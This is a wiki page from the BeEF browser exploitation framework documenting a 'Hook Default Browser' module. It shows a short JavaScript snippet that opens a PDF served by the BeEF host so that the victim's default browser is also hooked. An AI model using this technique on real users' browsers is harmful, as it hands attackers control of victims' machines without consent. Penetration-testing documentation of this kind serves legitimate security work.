-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Hook Default Browser
Haoxi Tan edited this page Jan 7, 2020
·
2 revisions
-
Objective: hook the default browser on Windows
-
Authors: saafan
-
Browsers: All except on iOS and Mac
This module attempts to hook the default browser by opening a PDF file in a new window. It will only hook the default browser if the current doesn't support the PDF protocol by itself.
var pdf_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
window.open( pdf_url, '_blank');
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK